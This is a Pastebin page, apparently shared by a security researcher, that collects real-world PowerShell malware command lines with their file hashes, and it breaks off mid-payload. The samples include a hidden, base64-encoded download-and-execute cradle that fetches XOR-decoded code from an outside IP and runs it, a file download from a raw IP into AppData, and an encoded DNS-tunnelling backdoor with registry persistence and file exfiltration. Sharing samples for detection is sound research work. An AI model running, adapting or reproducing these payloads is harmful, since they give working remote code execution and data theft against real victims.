daily pastebin goal
69%
SHARE
TWEET

Example Powershell payloads from @JohnLaTwC

a guest Sep 14th, 2016 2,171 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###:BEGIN prepared by @JohnLaTwC
  2. C:\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://151.80.237.220/1.zip','C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip').Items(),16)
  3. 271f9ddefb620828a74fe2fb6794a8bbdab25078d06a0efe8f93f6d99b95b81e
  4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -NoP -sta -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAVwAtAE8AQgBKAEUAYwBUACAAUwBZAHMAdABlAE0ALgBOAGUAdAAuAFcAZQBiAEMATABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAkAHcAQwAuAEgAZQBhAGQAZQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAFgAeQAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBFAFQALgBXAEUAYgBSAEUAUQBVAGUAUwBUAF0AOgA6AEQARQBmAGEAVQBsAFQAVwBFAEIAUABSAE8AeAB5ADsAJAB3AEMALgBQAFIATwBYAFkALgBDAFIAZQBEAGUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAHkAUwB0AEUATQAuAE4ARQB0AC4AQwBSAGUARABFAG4AVABJAGEATABDAEEAQwBIAEUAXQA6ADoARABFAGYAQQB1AEwAdABOAGUAVAB3AE8AcgBLAEMAUgBFAGQAZQBOAFQASQBBAGwAUwA7ACQASwA9ACcAUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AUABPAFQAQQBUAE8AJwA7ACQAaQA9ADAAOwBbAGMASABBAFIAWwBdAF0AJABCAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEAZABTAFQAUgBpAE4AZwAoACIAaAB0AHQAcABzADoALwAvADUANAAuADEANgA1AC4AMQAxADcALgAyADMAMgA6ADQANAAzAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBiAFgATwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUATgBnAHQASABdAH0AOwBJAEUAWAAgACgAJABiAC0AagBvAEkATgAnACcAKQA= --> $wc=NEW-OBJEcT SYsteM.Net.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeadeRS.Add('User-Agent',$u);$wc.PRoXy = [SYsTeM.NET.WEbREQUeST]::DEfaUlTWEBPROxy;$wC.PROXY.CReDenTIaLS = [SyStEM.NEt.CReDEnTIaLCACHE]::DEfAuLtNeTwOrKCREdeNTIAlS;$K='POTATOPOTATOPOTATOPOTATO';$i=0;[cHAR[]]$B=([cHaR[]]($Wc.DownLoadSTRiNg("https://54.165.117.232:443/index.asp")))|%{$_-bXOR$k[$I++%$k.LeNgtH]};IEX ($b-joIN'')
  5. 2897729dc0243f7066daa4f679bcd5a18bc4a08d37a14c7e67bf9437c8b269c9
  6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "  &{ $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN0KCJ3U2NyaXB0LlNoZWxsIikNCg0KSE9NRSA9ICIldXNlcnByb2ZpbGUlXEFwcERhdGFcTG9jYWxcTWljcm9zb2Z0XE1lZGlhXCINCg0KDQpkbnNDbWQgPSAicG93ZXJzaGVsbCAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtZmlsZSAiICYgSE9NRSAmICJkbi5wczEiDQoNCndzcy5SdW4gZG5zQ21kLDANCg0KDQoNCg==')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' $f;  $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCAkTXlJbnZvY2F0aW9uLk15Q29tbWFuZC5EZWZpbml0aW9uDQokR2xvYmFsOmRvbWFpbiA9ICJnb29nbGVkbnN1cGRhdGUudGsiDQokR2xvYmFsOklEID0gIkExIg0KJEdsb2JhbDpkRm9sZCA9ICRzY3JpcHRkaXIgKyAiXGRuIg0KJEdsb2JhbDp1Rm9sZCA9ICRzY3JpcHRkaXIgKyAiXHVwIg0KJEdsb2JhbDp0Rm9sZCA9ICRzY3JpcHRkaXIgKyAiXHRlIg0KJEdsb2JhbDpob3N0TGVuID0gMTANCiRHbG9iYWw6cmVnRXhpc3QgPSAwDQokR2xvYmFsOmJhdEV4aXN0ID0gMA0KaXBjb25maWcgL2ZsdXNoZG5zDQpGdW5jdGlvbiBJSWYoJElmLCAkUmlnaHQsICRXcm9uZykge0lmICgkSWYpIHskUmlnaHR9IEVsc2UgeyRXcm9uZ319DQpmdW5jdGlvbiBETlNSZXF1ZXN0DQp7DQogICAgcGFyYW0oIFtzdHJpbmddJGhvc3RuYW1lICkNCiAgICAkU3RvcGxvb3AgPSAkZmFsc2UNCiAgICBbaW50XSRSZXRyeWNvdW50ID0gIjAiDQogICAgJHJldCA9IFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXSgiMC4wLjAuMCIpDQogICAgJHN1Y2Nlc3MgPSAkZmFsc2UNCiAgICBkb3sNCiAgICAgICAgdHJ5ew0KICAgICAgICAgICAgJHJldCA9IFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGhvc3RuYW1lKQ0KICAgICAgICAgICAgJFN0b3Bsb29wID0gJHRydWUNCiAgICAgICAgICAgICRzdWNjZXNzID0gJHRydWUNCiAgICAgICAgfQ0KICAgICAgICBjYXRjaHsNCiAgICAgICAgICAgICRzdWNjZXNzID0gJGZhbHNlDQogICAgICAgICAgICBpZiAoJFJldHJ5Y291bnQgLWd0IDIwKXsNCgkJCSAgICANCgkJCSAgICAkU3RvcGxvb3AgPSAkdHJ1ZQ0KICAgICAgICAgICAgICAgIHRocm93DQoJCSAgICB9DQoJCSAgICBlbHNlIHsJCQkNCgkJCSAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAyDQoJCQkgICAgJFJldHJ5Y291bnQgPSAkUmV0cnljb3VudCArIDENCgkJICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCiAgICB3aGlsZSgkU3RvcGxvb3AgLWVxICRmYWxzZSkNCiAgICByZXR1cm4gJHJldA0KfQ0KZnVuY3Rpb24gZG93bmlwDQp7DQogcGFyYW0oIFtpbnRdJHR5cGUgKQ0KICRmaW5pc2hlZCA9IDANCiAkZmlsZW5hbWUgPSAiIg0KICRmaWxlSUQgPSAwDQogJHJlcVN0ciA9ICJJRiIgDQogDQogJGhvc3RuYW1lID0gJHJlcVN0clskdHlwZV0gKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogJGlwQWRkeSA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KIA0KIA0KIA0KIGlmICgoJGlwQWRkeVswXSAtZXEgJGlwQWRkeVsxXSkgLWFuZCAoJGlwQWRkeVswXSAtZXEgNjMpKQ0KIHsNCiAgICANCiAgICAkZmlsZUlEID0gW2NoYXJdJGlwQWRkeVsyXSArIFtjaGFyXSRpcEFkZHlbM10NCiAgICANCiAgICANCiAgICAkZmluaXNoZWRGaWxlTmFtZSA9IFtpbnRdMA0KICAgICRuYW1lUGFydCA9IFtpbnRdMA0KICAgIHdoaWxlKCRmaW5pc2hlZEZpbGVOYW1lIC1lcSAwKXsNCiAgICAgICAgJGhvc3RuYW1lID0gIlAiICsgJGZpbGVJRCArIFtzdHJpbmddJG5hbWVQYXJ0ICsgICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgIi4iICArICRHbG9iYWw6ZG9tYWluICAgICAgICANCiAgICAgICAgJGlwRmlsZU5hbWVBZGRyID0gKFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXShETlNSZXF1ZXN0ICRob3N0bmFtZSkpWzBdLkdldEFkZHJlc3NCeXRlcygpDQogICAgICAgIA0KICAgICAgICBpZiAoJGlwRmlsZU5hbWVBZGRyWzBdIC1lcSA2OCkNCiAgICAgICAgeyAgIA0KICAgICAgICAgICAgaWYgKCgkaXBGaWxlTmFtZUFkZHJbMV0gLWVxIDEyNykgLW9yICgkaXBGaWxlTmFtZUFkZHJbMl0gLWVxIDEyNykgLW9yICgkaXBGaWxlTmFtZUFkZHJbM10gLWVxIDEyNykpew0KICAgICAgICAgICAgICAgICRmaW5pc2hlZEZpbGVOYW1lID0gW2ludF0xIA0KICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICRmaWxlbmFtZSA9ICRmaWxlbmFtZSArIChJSWYgKCRpcEZpbGVOYW1lQWRkclsxXSAtbmUgMTI3KSAoW2NoYXJdJGlwRmlsZU5hbWVBZGRyWzFdKSAiIikgKyAoSUlmICgkaXBGaWxlTmFtZUFkZHJbMl0gLW5lIDEyNykgKFtjaGFyXSRpcEZpbGVOYW1lQWRkclsyXSkgIiIpICsgKElJZiAoJGlwRmlsZU5hbWVBZGRyWzNdIC1uZSAxMjcpIChbY2hhcl0kaXBGaWxlTmFtZUFkZHJbM10pICIiKQ0KICAgICAgICAgICAgJG5hbWVwYXJ0ID0gW2ludF0kbmFtZVBhcnQgKyBbaW50XTENCiAgICAgICAgfQ0KICAgICAgICANCiAgICB9DQogICAgDQogICAgDQogICAgJGZpbmlzaGVkRGF0YSA9IFtpbnRdMA0KICAgICRmc2l6ZSA9IFtpbnRdMA0KICAgICR0ZW1wRmlsZVBhdGggPSAgKCRHbG9iYWw6dEZvbGQpICsgIlwiICsgJGZpbGVuYW1lDQogICAgDQogICAgd2hpbGUoJGZpbmlzaGVkRGF0YSAtZXEgMCl7DQogICAgICAgIA0KICAgICAgICAkZmlsZUhkbCA9IFtpby5maWxlXTo6T3BlbigkdGVtcEZpbGVQYXRoLCJBcHBlbmQiKTsNCiAgICAgICAgJGhvc3RuYW1lID0gIkQiICsgJGZpbGVJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICsgKChbc3RyaW5nXShteWJhc2UzMlVJbnQzMiAoR2V0LUl0ZW0gJHRlbXBGaWxlUGF0aCkubGVuZ3RoKSkuUmVtb3ZlKDAsMikuUmVtb3ZlKDUsMSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICAgICAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSkuR2V0RW51bWVyYXRvcigpfCBTb3J0LU9iamVjdCBhZGRyZXNzIHwgZm9yZWFjaHsNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVswXSAtZ3QgMTMwKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICRzZXF1ZW5jZUluZGV4ID0gW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVswXSAtIDI0MCAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYgKFtpbnRdJF8uR2V0QWRkcmVzc0J5dGVzKClbMV0gLW5lIDEyNyl7DQogICAgICAgICAgICAgICAgICAgICRmaWxlSGRsLldyaXRlQnl0ZSgkXy5HZXRBZGRyZXNzQnl0ZXMoKVsxXSkgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVsyXSAtbmUgMTI3KXsNCiAgICAgICAgICAgICAgICAgICAgJGZpbGVIZGwuV3JpdGVCeXRlKCRfLkdldEFkZHJlc3NCeXRlcygpWzJdKQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVszXSAtbmUgMTI3KXsNCiAgICAgICAgICAgICAgICAgICAgJGZpbGVIZGwuV3JpdGVCeXRlKCRfLkdldEFkZHJlc3NCeXRlcygpWzNdKQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBpZiAoW2ludF0kXy5HZXRBZGRyZXNzQnl0ZXMoKVszXSAtZXEgMTI3KXsgDQogICAgICAgICAgICAgICAgICAgICRmaW5pc2hlZERhdGEgPSAxDQogICAgICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgJGZpbGVIZGwuQ2xvc2UoKQ0KICAgIH0gICAgDQogICAgJGI2NERhdGEgPSBbU3lzdGVtLklPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJHRlbXBGaWxlUGF0aCkNCiAgICAkZGF0YSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRDaGFyQXJyYXkoJGI2NERhdGEsMCwkYjY0RGF0YS5MZW5ndGgpIA0KICAgICRmaWxlUGF0aCA9ICAoJEdsb2JhbDpkRm9sZCkgKyAiXCIgKyAkZmlsZW5hbWUNCiAgICBbaW8uZmlsZV06OldyaXRlQWxsQnl0ZXMoJGZpbGVQYXRoLCRkYXRhKQ0KICAgIGRlbCAkdGVtcEZpbGVQYXRoDQogICAgcmV0dXJuICRmaWxlbmFtZQ0KIH0NCiANCiByZXR1cm4gJGZpbGVuYW1lDQp9DQpmdW5jdGlvbiB1cGlwDQp7DQogICAgcGFyYW0oIFtzdHJpbmddJGZuYW1lICkNCiAgICANCiAgICAkZmlsZVBhdGggPSAoJEdsb2JhbDp0Rm9sZCkgKyAiXCIgKyAkZm5hbWUNCiAgICAkc3VjY2VzcyA9IDANCiAgICANCiAgICAkaG9zdG5hbWUgPSAiWSIgKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkrICRmbmFtZS5SZXBsYWNlKCIuIiwiIikgICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgDQogICAgJHJlc3BCeXRlcyA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KICAgIA0KICAgIGlmICgoJHJlc3BCeXRlc1swXSAtZXEgJHJlc3BCeXRlc1sxXSkgLWFuZCAoJHJlc3BCeXRlc1swXSAtZXEgW2J5dGVdNzQpKQ0KICAgIHsNCiAgICAgICAgJHVwbG9hZElEID0gW2NoYXJdJHJlc3BCeXRlc1syXSArIFtjaGFyXSRyZXNwQnl0ZXNbM10NCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICAkdXBsb2FkZWRDb21wbGV0ZVNpemUgPSBbdWludDMyXTANCiAgICAgICAgJGZpbGVEYXRhID0gKGdldC1jb250ZW50ICRmaWxlUGF0aCAtZW5jb2RpbmcgYnl0ZSkNCiAgICAgICAgJGJhc2UzMmZpbGVkYXRhID0gKGJhc2UzMmRhdGEgJGZpbGVEYXRhKQ0KICAgICAgICB3aGlsZSgkdXBsb2FkZWRDb21wbGV0ZVNpemUgLWx0ICRiYXNlMzJmaWxlZGF0YS5sZW5ndGgpDQogICAgICAgIHsNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICAkaG9zdG5hbWUgPSAiUSIgKyAkdXBsb2FkSUQgKyAoW3N0cmluZ10obXliYXNlMzJVSW50MzIgJHVwbG9hZGVkQ29tcGxldGVTaXplKSkuUmVtb3ZlKDAsMikuUmVtb3ZlKDUsMSkgKyAoLWpvaW4gJGJhc2UzMmZpbGVkYXRhWyR1cGxvYWRlZENvbXBsZXRlU2l6ZS4uJCgkdXBsb2FkZWRDb21wbGV0ZVNpemUgKyAkR2xvYmFsOmhvc3RMZW4tOCldKSArICIuIiArICRHbG9iYWw6ZG9tYWluICAgICAgICAgICAgIA0KICAgICAgICAgICAgDQogICAgICAgICAgICAkcmVzcEJ5dGVzID0gKFtTeXN0ZW0uTmV0LklQQWRkcmVzc1tdXShETlNSZXF1ZXN0ICRob3N0bmFtZSkpWzBdLkdldEFkZHJlc3NCeXRlcygpDQogICAgICAgICAgICANCiAgICAgICAgICAgIGlmIChbaW50XSRyZXNwQnl0ZXNbMF0gLWVxIDc1KQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICR1cGxvYWRlZENvbXBsZXRlU2l6ZSA9IFt1aW50MzJdKCRyZXNwQnl0ZXNbM10rJHJlc3BCeXRlc1syXSoxMDArJHJlc3BCeXRlc1sxXSoxMDAwMCkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSAgICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgJGhvc3RuYW1lID0gIloiICsgJHVwbG9hZElEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkgICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICAgICAgDQogICAgICAgIGlmICgoW2ludF0kcmVzcEJ5dGVzWzBdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzFdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzJdIC1lcSA3NikgLWFuZCAoW2ludF0kcmVzcEJ5dGVzWzNdIC1lcSA3NikpDQogICAgICAgIHsNCiAgICAgICAgICAgIGRlbCAkZmlsZVBhdGgNCiAgICAgICAgICAgIHJldHVybiAiT0siDQogICAgICAgIH0NCiAgICB9DQp9DQpmdW5jdGlvbiBteVRvVWludDY0DQp7DQogICAgcGFyYW0oIFtieXRlW11dJGRhdGEgKSAgICAgIA0KICAgICRyZXRVaW50ID0gW3VpbnQ2NF0wDQogICAgJHBvd0NvdW50ID0gW2ludF0wDQogICAgZm9yKCRsZW49KCRkYXRhLkxlbmd0aC0xKTsgJGxlbiAtZ2UgMDsgJGxlbi0tKQ0KICAgIHsNCiAgICAgICAgJHJldFVpbnQgPSAkcmV0VWludCArICRkYXRhWyRsZW5dICogW01hdGhdOjpQb3coMTYsJHBvd0NvdW50KQ0KICAgICAgICAkcG93Q291bnQgPSAkcG93Q291bnQgKyAyOyAgICAgICAgDQogICAgfSAgICANCiAgICByZXR1cm4gJHJldFVpbnQNCn0NCmZ1bmN0aW9uIGJhc2UzMmRhdGENCnsNCiAgICBwYXJhbSggW2J5dGVbXV0kZGF0YSApICAgIA0KICAgICRyZXQgPSAiIg0KICAgIGlmICgkZGF0YS5MZW5ndGggLWVxIDApIHsgcmV0dXJuIHJldH0NCiAgICAkY2hhcm1hcCA9ICJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NSINCiAgICAgICAgDQogICAgDQogICAgZm9yICgkZml2ZUJ5dGVJbmRleCA9IDA7JGZpdmVCeXRlSW5kZXggLWx0ICBbTWF0aF06OkNlaWxpbmcoJGRhdGEuTGVuZ3RoLzUpOyAkZml2ZUJ5dGVJbmRleCsrKSAjDQogICAgew0KICAgICAgICANCiAgICAgICAgJGJ5dGVzID0gW2J5dGVbXV0kZGF0YVsoJGZpdmVCeXRlSW5kZXggKiA1KS4uKElJRiAoJGZpdmVCeXRlSW5kZXggLWx0ICgkZGF0YS5MZW5ndGgvNSkpICgoJGZpdmVCeXRlSW5kZXgqNSkrNCkgICgkZGF0YS5MZW5ndGgtMSkpXQ0KICAgICAgICANCiAgICAgICAgDQogICAgICAgICRudW1iZXIgPSAgbXlUb1VpbnQ2NCAkYnl0ZXMNCiAgICAgICAgDQogICAgICAgICRwYWRkaW5nQml0UmVxdWlyZSA9ICg1IC0gKCgkYnl0ZXMuTGVuZ3RoICogOCkgJSA1KSkgJSA1IA0KICAgICAgICAkb3V0cHV0QjMyTGVuID0gKCRieXRlcy5MZW5ndGgqOCArICRwYWRkaW5nQml0UmVxdWlyZSkvNQ0KICAgICAgICANCiAgICAgICAgZm9yICgkcG93SW5kZXggPSAoJGJ5dGVzLkxlbmd0aCo4IC0gMSkgOyAkcG93SW5kZXggLWdlIDQ7ICRwb3dJbmRleCA9ICRwb3dJbmRleCAtIDUpDQogICAgICAgIHsgICAgICAgICANCiAgICAgICAgICAgICRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbW01hdGhdOjpQb3coMiwoLTEgKiAkcG93SW5kZXggKyA0KSkqKCRudW1iZXIgLWJhbmQgW3VpbnQ2NF0oW01hdGhdOjpQb3coMiwkcG93SW5kZXgpICsgW01hdGhdOjpQb3coMiwkcG93SW5kZXgtMSkgKyBbTWF0aF06OlBvdygyLCRwb3dJbmRleC0yKSArIFtNYXRoXTo6UG93KDIsJHBvd0luZGV4LTMpICsgW01hdGhdOjpQb3coMiwkcG93SW5kZXgtNCkpKV0gICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgaWYgKCRwb3dJbmRleCAtZ2UgMCkgDQogICAgICAgIHsgICAgICAgICAgICANCiAgICAgICAgICAgIHN3aXRjaCAoJHBvd0luZGV4KQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIDAgeyRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbJG51bWJlciAtYmFuZCBbdWludDY0XSgxKV0gKyAiNiJ9DQogICAgICAgICAgICAgICAgMSB7JHJldCA9ICRyZXQgKyAkY2hhcm1hcFskbnVtYmVyIC1iYW5kIFt1aW50NjRdKDMpXSArICI3In0NCiAgICAgICAgICAgICAgICAyIHskcmV0ID0gJHJldCArICRjaGFybWFwWyRudW1iZXIgLWJhbmQgW3VpbnQ2NF0oNyldICsgIjgifQ0KICAgICAgICAgICAgICAgIDMgeyRyZXQgPSAkcmV0ICsgJGNoYXJtYXBbJG51bWJlciAtYmFuZCBbdWludDY0XSgxNSldKyAiOSJ9DQogICAgICAgICAgICB9IA0KICAgICAgICB9ICAgICAgICAgICAgICANCiAgICB9DQogICAgcmV0dXJuICRyZXQgICAgICAgIA0KfQ0KZnVuY3Rpb24gbXliYXNlMzJVSW50MzINCnsNCiAgICBwYXJhbShbdWludDMyXSRpbnB1dG51bWJlcikNCiAgICAkcmV0ID0gIiINCiAgICAkYnl0ZXMgPSAoW2JpdGNvbnZlcnRlcl06OkdldEJ5dGVzKCRpbnB1dG51bWJlcikpDQogICAgW2FycmF5XTo6UmV2ZXJzZSgkYnl0ZXMpDQogICAgcmV0dXJuIChiYXNlMzJkYXRhICRieXRlcykNCn0NClRyeQ0Kew0KICAgIGlmKC1ub3QoVGVzdC1QYXRoIC1QYXRoICgkZ2xvYmFsOnVGb2xkKSkpew0KICAgICAgICBta2RpciAkZ2xvYmFsOnVGb2xkDQogICAgfQ0KICAgIGlmKC1ub3QgKFRlc3QtUGF0aCAtUGF0aCAoJGdsb2JhbDpkRm9sZCkpKXsNCiAgICAgICAgbWtkaXIgJGdsb2JhbDpkRm9sZA0KICAgIH0NCiAgICBpZigtbm90IChUZXN0LVBhdGggLVBhdGggKCRnbG9iYWw6dEZvbGQpKSl7DQogICAgICAgIG1rZGlyICRnbG9iYWw6dEZvbGQNCiAgICB9DQogICAgDQogICAgaWYgKChHZXQtSXRlbVByb3BlcnR5IC1QYXRoIEhLQ1U6XFNvZnR3YXJlXE1pY3Jvc29mdFxGVFAgLU5hbWUgSUQgIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlKSAtbmUgJG51bGwpDQogICAgew0KICAgICAgICAkR2xvYmFsOklEID0gKFtzdHJpbmddKChHZXQtSXRlbVByb3BlcnR5IC1QYXRoIEhLQ1U6XFNvZnR3YXJlXE1pY3Jvc29mdFxGVFAgLU5hbWUgSUQpLklEKSkuU3Vic3RyaW5nKDAsMikNCiAgICAgICAgDQogICAgfQ0KICAgIA0KICAgIGlmICgkR2xvYmFsOklEIC1lcSAiQTEiKQ0KICAgIHsNCiAgICAgICAgJGhvc3RuYW1lID0gIk4iICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSkgICsgIi4iICsgJEdsb2JhbDpkb21haW4gICAgICAgICANCiAgICAgICAgJHJlc3BCeXRlcyA9IChbU3lzdGVtLk5ldC5JUEFkZHJlc3NbXV0oRE5TUmVxdWVzdCAkaG9zdG5hbWUpKVswXS5HZXRBZGRyZXNzQnl0ZXMoKQ0KICAgICAgICANCiAgICAgICAgaWYgKChbaW50XSRyZXNwQnl0ZXNbMF0gLWVxIDYxKSAtYW5kIChbaW50XSRyZXNwQnl0ZXNbMV0gLWVxIDYxKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJEdsb2JhbDpJRCA9IFtjaGFyXSRyZXNwQnl0ZXNbMl0gKyBbY2hhcl0kcmVzcEJ5dGVzWzNdDQogICAgICAgICAgICBOZXctSXRlbVByb3BlcnR5IC1QYXRoICJIS0NVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcRlRQIiAtTmFtZSAiSUQiIC1WYWx1ZSAkR2xvYmFsOklEIC1Qcm9wZXJ0eVR5cGUgU3RyaW5nIC1Gb3JjZQ0KICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICB9DQogICAgDQogICAgJGhvc3RuYW1lID0gIkMiICsgJEdsb2JhbDpJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgMiB8ICUge1tjaGFyXSRffSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICANCiAgICAgICAgICAgIA0KICAgIGlmICgoW2ludF0kcmVzcEJ5dGVzWzBdIC1lcSA2MikpDQogICAgew0KICAgICAgICAkR2xvYmFsOnJlZ0V4aXN0ID0gJHJlc3BCeXRlc1sxXQ0KICAgICAgICAkR2xvYmFsOmJhdEV4aXN0ID0gJHJlc3BCeXRlc1syXQ0KICAgICAgICAkR2xvYmFsOmhvc3RMZW4gID0gJHJlc3BCeXRlc1szXQ0KICAgICAgICANCiAgICB9DQogICAgDQogICAgJGhvc3RuYW1lID0gIlQiICsgJEdsb2JhbDpJRCArICgtam9pbiAoKDY1Li45MCkgKyAoNDguLjU3KSArICg5Ny4uMTIyKXwgR2V0LVJhbmRvbSAtQ291bnQgKCRHbG9iYWw6aG9zdExlbi0zKSB8ICUge1tjaGFyXSRffSkpICArICIuIiArICRHbG9iYWw6ZG9tYWluIA0KICAgICRyZXNwQnl0ZXMgPSAoW1N5c3RlbS5OZXQuSVBBZGRyZXNzW11dKEROU1JlcXVlc3QgJGhvc3RuYW1lKSlbMF0uR2V0QWRkcmVzc0J5dGVzKCkNCiAgICANCiAgICBpZiAoKFtpbnRdJHJlc3BCeXRlc1swXSAtbmUgNjUpIC1vciAoW2ludF0kcmVzcEJ5dGVzWzFdIC1uZSA2NSkgLW9yIChbaW50XSRyZXNwQnl0ZXNbMl0gLW5lIDY1KSAtb3IgKFtpbnRdJHJlc3B